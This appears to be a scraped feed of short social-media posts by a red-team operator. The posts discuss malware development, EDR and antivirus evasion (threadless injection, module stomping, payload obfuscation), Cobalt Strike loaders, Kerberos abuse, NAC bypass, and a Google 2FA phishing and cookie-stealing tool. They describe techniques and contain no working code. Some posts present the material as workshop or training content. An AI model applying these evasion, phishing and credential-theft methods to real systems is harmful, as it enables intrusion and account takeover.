As EDR can overlook standard API that create thread, you can use EnumThreadWindows to run your payload without explicitly calling ResumeThread !
Just load your PE, perform relocation and IAT fixes then call EnumThreadWindows on your PE start address to see the magic !
DLL Injection seems to be the easy way to bypass EDR. I was able to bypass some well known EDR with it.
It can be used to perform the first process injection, and then perform standard self-injection to deliver the beacon to avoid unnecessary detection in the next stages.
Phishing Google 2FA compliant
Steal the user credentials/cookies, then reinject them in your own chrome session to steal user access.
On the right : the targeted user view
On the left : the attacker view
Automatized using undetected chromedriver.
(Sorry for the GIF quality)
The use of hardware breakpoint and arguments patching directly in the register seems to work like a charm.
SentinelOne hooks bypassed in a minute.
Thank
@rad9800
for the idea and your implementation example that work out of the box ! ()
I published my
#Defcon31
workshop on malware development !
If you want to dive into malware development or upgrade your game, feel free to browse the code snippets and try to bypass the MDE EDR !
I hope it will make you as happy as I am !
Didn't think it was possible, but it seems that developing
#Rust
#malware
could be a way to limit detection (at least on
#VirusTotal
).
Basic shellcode XOR encryption and API dynamic resolution seems to be enough to get a 0 score on VirusTotal.
While digging into old research from
@aionescu
and Nirvana debug, I found an undocumented way to achieve threadless process injection.
It bypasses several
#EDR
out of box and the miss of Kernel insight on it eases bypass with simple userland unhooking.
I've released the python code I used to transform a binary into a C header file to hide your payload in .rdata. Nothing fancy, but could save time😊
It just splits the binary in several strings to evade static analysis and then rebuild it at compile time
Muscle up your game with Kerberos. Abuse tickets and Kerberos extensions to elevate your privileges.
I've built a small lab around the S4U2Self Abuse :
Find all you need here :
Thanks
@pentest_swissky
for the help on ansible !
I published my Kerberos experiments. The code is here for educational use only. Do not use it for pentest as it is neither OPSEC nor stable and kinda messy.
But if you want to see how to play with
#Kerberos
with
#Windows
, it can be a starting point ! 😊
Simple module stomper with MSF reverse shell bypassing standard anti-virus such as
#Defender
or
#Kaspersky
. Loading a legit DLL such as amsi.dll avoids use of VirtualAlloc and gives a legit use for the allocated memory.
Got the idea from . Thanks
@__mez0__
I wrote an article on how to bypass VPN compliance checks. It's based on PaloAlto VPN but the approach can be applied for other VPN.
Process exploration, reverse engineering, step by step explanation !
Thank to
@iansus
et
@th3m4ks
for the review !
Finally ! After one week spent in the WinHTTP.dll, I finally succeed in making it work with my custom DLL loader without hijacking
#IAT
.
The idea is to locate the
#LdrpInvertedFunctionTable
and add the DLL ExportDirectory in it once it has been loaded and linked to the
#PEB
.
Finished my LoadLibrary implementation ! Still not link to the PEB as Windows structures are pain in the * but it works !
Was nice to dive into PE structure !
Credit :
-
@Ahm3d_H3sham
-
@batsec
-
@__mez0__
I can go to sleep now.
The DLL loader loads an arbitrary DLL without raising the usual event. The delayed DLL are loaded just in time, to avoid loading several DLL for nothing.
The DLL ensures the integrity of Windows structures and thus is compatible with the Win32API.
If you missed my talk at
@_leHACK_
, you can find the slides here.
The presentation shows some unusual techniques to perform process injection without the standard Win32API.
Took me 8 hours but that was fun !
A nice way to begin the year 🥳
This is a nice trainning with a nice lab for anyone wanting to enhance his skillset.
If your grand parents gave you some money for Xmas, invest it on yourself and take the
#CRTO
training by
@zeropointsecltd
! 🤗
Swapping commandline argument at runtime on Windows signed binary through DLL Proxying.
Could be nice to avoid detection based on commandline.
Thanks
@iansus
for the idea !
Just adapted
@_EthicalChaos_
#ThreadLess
injection to work with
#Cobalt
beacon in pure C.
It works really nice ! I mixed it with module stomping to avoid beacon execution from unbacked memory, important VirtualAlloc and the use of CRT to execute the beacon itself.
All the DLL loader I saw from now are resolving all the delayed import when performing the Snapping.
You can avoid loading all the DLL by hijacking the
#ResolveDelayLoadedAPI
during the Snapping to resolve the import when they are asked by the DLL.
It avoids loading several DLL.
Finally 🤩 I got a PIC code for my
#beacon
! It was a really nice journey and a lot of things have been learnt on the way.
If you want to try it too, I found this blog by
@winternl_t
really interesting
And as usual, the
@C5pider
#Havoc
❤️
An interesting post about Kernel Callback used by EDR. It’s a nice article to read if you want to dive into EDR Kernel Callbacks bypass.
Thanks
@synzack21
for the blogpost ! :)
The part about
@fdiskyou
evil.sys driver and experiments is really nice ! :)
If you want to automate Google login for, ... I don't know ..., phishing campaign for example, give a try to this custom chromedriver. It bypass the restrictions set by Google on the login through automation scripts.
Hey ! I've totally forgotten to publish my CoffLoader code.
Remember it is not a production ready code, but an example with my article, so the code is kind of a mess...
Thanks to
@TrustedSec
and
@C5pider
for paving me the way with their code & article !
Here is some videos on of my custom C2 🫣
The first one shows JIT beacon compilation and basic commands.
The second one shows the linked beacon capabilities with a TCP beacon.
There is a lot of improvements needes but it’s a good start 😊
Took way more time than I though, but now it works ! I can ask a TGT and inject it without
#Rubeus
. Not sure if it's useful, but it was really interesting !
Next thing is to look into the
#TGTDeleg
trick and adapt it as a
#BOF
(even if I know a working one already exists).
Three freaking days to find the bug.
This seems to be pModBaseAddrIndex->Root instead of pModBaseAddrIndex in the DarkLoadLibrary project.
It raises random bug with some DLL otherwise and a hell to debug. The NTDLL assembly gives the answer as always.
And here is the video for the Linked compilation part. In this example, it chain a shellcode loader with a wrapper to transform a
#Cobaltstrike
beacon from raw shellcode to an "
#OPSEC
" binary
Here is some videos for the compilation pipeline😊
There are three parts:
- Training to know what you use
- Simple compilation
- Linked compilation to chain different loader
This is early dev, so additional feature will be added. If you have some ideas, feel free to share !
If you try to hide your payloads in the .rdata by splitting it in several strings an reassembling them during execution, it can be interesting to disable compiler code optimization... Will save you some time...
#ElasticEDR
Premium has a quite aggressive static detection
Another step reached !
Got full support of
#CobaltStrike
#BOF
in my custome
#C2
beacon. Some upgrade can be done, but that's a start.
Here is a simple test with the
@TrustedSec
BOF collection ()
It's 2023, CrackMapExec can now dump DPAPI credentials as a core feature !🚀
This is possible thanks to the work of
@_zblurx
and his library dploot ! He also added a module to dump firefox passwords 🔥
Pushed on
@porchetta_ind
v5.4.5 Bruce Wayne 🪂
No excuse, DA everytime, 🔽
This feeling when you dir \\DC\C$ will never fade.
I've rooted several forests but it always hit the same than the first time cause this is not about controlling the whole forest, it's about the journey: from the first phishing mail you sent to the total compromise of the forest
And the last one implemented on the pipeline !
If you want to run a Rubeus directly on the DC to wake up the SOC before the holidays.
It supports:
- Custom GetProcAddress / LoadLibrary /
GetModuleHandle
- String obfuscation
- ETW/AMSI patching
- HWBP for unhooking
- And more !
Continuing the
#NtSetInformationProcess
exploitation series,
@th3m4ks
wrote an article on universal
#EDR
blinding through exploitation of NtSetInformationProcess and it's worth it
#Reversing
the
#NTDLL
is really interesting, I see several data structures or algorithms I only used in school.
I rediscovered fast sorting algorithm, red and black binary trees, dichotomy and even what I think was
#Dijkstra
algorithm.
Just commit my changes on
#Impacket
Secretsdump 🤞
If merged, you will be able to dump TDO secrets from a local NTDS without needing additional DCSync.
You can find the PR changes here :
Now all my malware have been ported to CMake, it's time to create a nice compilation pipeline.
The goal is to be able to add different layers easily through the GUI without needing to install the whole toolchain and without giving direct access to the source code...
Linked
#MSSQL
servers are an interesting feature, but if you misconfigure them and you add an a self-referenced link with
#SA
privileges on the database, you've just paved the way for sneaky privesc through OPENQUERY, OPENROWSET and EXECUTE AT.
If you missed my talk at
#LeHack
2023 on Uncommon pattern for process injection, you still can see it on Youtube (French only 😅)
Thanks
@_leHACK_
for the event and the opportunity !
If you failed to use the WinHTTP.dll with a custom LoadLibrary (error 126), it can be due to the TakeSingleDllRef function.
This function perform a GetModuleHandleExA on itself to get its module HANDLE.
In this case, you have to hijack this function in the DLL's IAT when loaded.
Using EDR for malware development really help to understand how each technique impact the detection. Here is the difference of alerts raised with module Stomping,
@rad9800
HWBP and
@_EthicalChaos_
threadless injection.
1 - HWBP only
2 - 1 + Threadless
3 - 1 + 2 + Module Stomping
What a journey ! The
#Cybernetics
lab by
@hackthebox_eu
is really interesting and worth its price !
Kept me busy for a month. If you want to try an advanced HTB lab, upgrade your AD skills or just try some C2 capabilities, just take this lab. You won't regret it.
If you want to develop malware things, develop malware things, don't be stupid like me and start developing a full broken ecosystem by yourself...
I'm already starting to forget why I started this project 🫠
And yes I know about
#Mythic
, but I don't like WebUI C2...
I ported my
#cobaltstrike
loaders as
#BOF
to avoid using the built-in inject command.
That was fun and not so hard with the
@TrustedSec
article and CS-Situational-Awareness-BOF repo as example.
I think I finally managed to build a real company network at home.
I have DMZ, several VLAN, a reverse proxy, IPSEC VPN and nothing work at the same time, I don't know why and I have no idea what is exposed on Internet...
First step for position independent code (
#PIC
):
✔️get rid of the .data section
(if someone remember the new C keyword allowing to define string directly on the stack without using the { } notation)
Hey !
@Defcon
workshops have been released !
You can find mine here !
Feel free to ask for additional questions and apply !
I’m so glad to see you in Vegas 🤗
Developing P2P
#beacon
capabilities is like doing networking with layer 7 only... In two weeks you will se a new BGP release working on layer 7 only 😂
Now basic features are working, let's make it
#PIC
and add some
#malware
stuff in it 🤓
Something nice to know, WinHTTP.dll, when loaded, WinHTTPOpen function reload the WinHTTP.DLL to find some specific functions...
Bru, if you are executing this code it's because you are already loaded why are you doing this ? You fuck up the benefits of my custom LoadLibrary...
If you are doing some development in C/C++, you really should use Microsoft Application Verifier !
It is really nice to debug memory allocation, double free, wrong API usage and a lot more !
Reading the code and redeveloping parts of the tools you use on a regular basis is, I think, the best way to deeply understand the underlying concepts.
Currently redeveloping some part of
#Rubeus
and I'm learning so much about
#Kerberos
implementation/ exploitation on Windows !
Here is some videos for the compilation pipeline😊
There are three parts:
- Training to know what you use
- Simple compilation
- Linked compilation to chain different loader
This is early dev, so additional feature will be added. If you have some ideas, feel free to share !
My
#CoffLoader
is fully functionnal ! It support unintialized variable through dynamic .bss and several relocation type.
Thank’s to
@C5pider
for giving me the idea through its
#CoffeeLdr
and
@TrustedSec
for showing me the way !
I will try to make it public as soon as I can 🥹
If you want to learn how to unhook
#EDR
hooks with style and understand how kernel callbacks can be bypassed through a vulnerable driver, look at the
#EDRSandblast
code !
I’ve learnt so much from this project ! Thank’s
@th3m4ks
and
@_Qazeer
for your work !
Bonus : static lib ❤️
A promise is a promise: the slides from the
#DEFCON30
DemoLabs
@_Qazeer
and I presented about EDRSandblast are uploaded on GitHub (), along with the latest version of the tool! Check out the list of new features in the slides, documentation is on its way ;)
My first
@defcon
has ended.
It was a great experience even if my workshop didn't fully worked as planned due to some Wifi failure limiting acces to the cloud EDR and the tools download.
Now, it's a 2 weeks infosec break for a USA road trip ! First step, Vegas to Grand Canyon.
What it’s like to be a redteamer ? 🫣
Spending 3 days changing a legit app compromised in a full C2 to rebound among all users and avoiding a painful phishing campaign 🫠
I’m sure they didn’t even know their application can be used like this 😂
Me fucking around the Ldr Red and Black trees until my DLL accepts to appear as loaded and stop crashing during entrypoint processing...
(yes treeS, they got two freaking trees to keep track of a loaded DLL)
I don't know if it will be working well at the end, if it will be
#OPSEC
or if I will be able to use it in a real world operation but all the things I'm learning all along the way is worth it 🫠
I will finally be able to work on some
#malware
things now ❤️
How, I saw you have finally found an exploitation path, so everything is finished now ? Can you extract the NTDS ? Should not take too long
Me and my 3 chained SOCKS
Thanks and Credit to
@OtterHacker
at this point, as your DefCon Workshop Slides/Code gave me the inspiration to combine Module Stomping with ThreadlessInject to avoid any injection alerts.
@nu11charb
Trendmicro still using hooking on NtWriteVirtualMemory. Your loader must be adapted to the EDR. Saying this technique is an OPSEC mistake depends on the EDR…
Just submitted my first machine to
@hackthebox_eu
! Hope it will be accepted 🤞
The machine is based on vulnerability found during pentests !
Thanks for this amazing playground !
Once again, my today experience shows that
#NAC
is not a security measure against attack but against simple users.
Took 2 network adapters, and few commands to bypass it...
Other surprise, I saw a printer supporting 802.1x.
Write up can be found here:
Yey ! I just have to pack this in a nice
#Impacket
function and add the option in
#Secretsdump
!
WinXP source code helped me to successfully map NTDS columns with its content ! Never though I would one day have to look at this code 😊
Xmas commit !
Will do some additional testing and refactoring before releasing it out, but here is a modular project making Google Account
#phishing
easier through cookies stealing.
The REX about its possible use in
#RedTeam
operation is in progress !
Will make a POC video today
Cyber break is finished, time to go back to breaking things I know nothing about
Before that, here is a post on my first
@defcon
experience as a Workshop Instructor
If you want to create a workshop for
#Defcon32
, you will find the rookie mistakes I did.
It is gonna be long to describe ASREQ ASN1 with my custom structure 😅
The more I dive into Windows internal crypto to compute hashes and Kerberos elements, the more respect I have for
@gentilkiwi
.
Spent hours with a debugger trying to understand how the CRYPTDLL interface works